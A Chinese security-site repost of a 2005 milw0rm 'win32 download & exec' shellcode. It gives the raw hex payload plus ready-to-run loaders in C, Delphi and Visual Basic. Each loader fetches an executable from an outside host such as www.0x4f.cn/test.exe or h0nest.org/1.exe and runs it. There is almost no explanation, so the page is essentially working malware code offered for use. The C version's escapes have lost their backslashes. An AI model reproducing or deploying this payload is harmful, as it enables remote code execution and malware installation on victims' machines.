win32 download & exec shellcode 203 bytes

admin
admin
admin
101400
文章
87
评论
2021年4月3日18:56:27评论31 views字数 4545阅读15分9秒阅读模式

milw0rm 上的 win32 download & exec shellcode:

EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865

VC+:
/*
    ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode                              ::
:: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:>                                ::
:: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::

*/

#include
#include

unsigned char sh4llcode[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"
"http://h0nest.org/1.exe";

int main()
{

 void (*c0de)();
 printf("Win32 "download & exec shellcode"n");
 *(int*)&c0de = sh4llcode;
 c0de();
}

// milw0rm.com [2005-12-23]

DELPHI:

program download;

const

ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe

var
ShellCodeProc: procedure;

begin
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.

VB:

Attribute VB_Name = "Module1"
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Sub Main()
Dim ShellCode
Dim download() As Byte
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)

ReDim download(UBound(ShellCode))

For i = 0 To UBound(ShellCode)
     download(i) = ShellCode(i)
Next

CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&

End Sub

文章来源于lcx.cc:win32 download & exec shellcode 203 bytes

相关推荐: 【视频】萌猫萌狗抢薯片 - 注意狗狗动作

萌猫萌狗抢薯片,注意狗狗动作。这狗的眼神好复杂,这猫是狮子座的吧……文章来源于lcx.cc:【视频】萌猫萌狗抢薯片 - 注意狗狗动作相关推荐: Abs取、返回指定数字绝对值函数功能详解Abs 取、返回指定数字绝对值函数功能详解 功能描述:     返回数字的绝…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:56:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   win32 download & exec shellcode 203 byteshttps://cn-sec.com/archives/319305.html

发表评论

匿名网友 填写信息